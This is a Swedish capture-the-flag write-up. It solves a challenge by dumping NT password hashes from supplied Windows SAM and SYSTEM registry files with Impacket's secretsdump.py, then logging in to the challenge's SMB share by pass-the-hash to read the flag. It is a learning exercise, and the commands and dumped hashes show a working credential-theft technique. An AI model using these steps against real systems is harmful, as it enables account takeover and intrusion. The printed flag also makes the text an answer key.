Beskrivning
Flaggan finns någonstans bland serverns utdelade filer, men hur kan man logga in på den? Allt vi har är ett par filer från någon som verkar heta Sam(?), kan de vara till nytta på något sätt?
Lösning
Bifogat till utmaningen är två filer, sam och system. Filnamnet sam antyder att det kan vara en Windows SAM-fil, som innehåller hashar för användarkonton. Den andra filen, system, är troligen en Windows System-fil som innehåller systemrelaterad information, inklusive salt för lösenordshashar.
Kör vi file sam och file system får vi:
sam: MS Windows registry file, NT/2000 or above
system: MS Windows registry file, NT/2000 or above
Vilket verifierar våra antaganden.
För att extrahera lösenordshasharna från filerna kan vi använda secretsdump.py från Impacket-paketet.
secretsdump.py -sam ./sam -system ./system local
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[] Target system bootKey: 0x5e26b8cb474c2cdb3fe7dba73b57a1e9
[] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9ae191a98a75bf86fe9b623fb954117:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
flagholder:1001:aad3b435b51404eeaad3b435b51404ee:8737dfdc9280b43767f37cabe1563d8a:::
[*] Cleaning up…
Här får vi ut tre användare: Administrator, Guest och flagholder. Vi kan använda flagholders hash för att logga in via SMB med smbclient:
smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:8737dfdc9280b43767f37cabe1563d8a flagholder@challs.crate.nu -port 21562
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
sysvol
netlogon
absolutely_no_flags_here
IPC$
# use absolutely_no_flags_here
# ls
drw-rw-rw- 0 Sat Nov 15 14:35:26 2025 .
drw-rw-rw- 0 Sat Nov 15 14:35:25 2025 ..
-rw-rw-rw- 44 Tue Jun 10 15:58:46 2025 flag.txt
# cat flag.txt
cratectf{pass_the_hash_or_give_me_the_cash}
Flagga: cratectf{pass_the_hash_or_give_me_the_cash}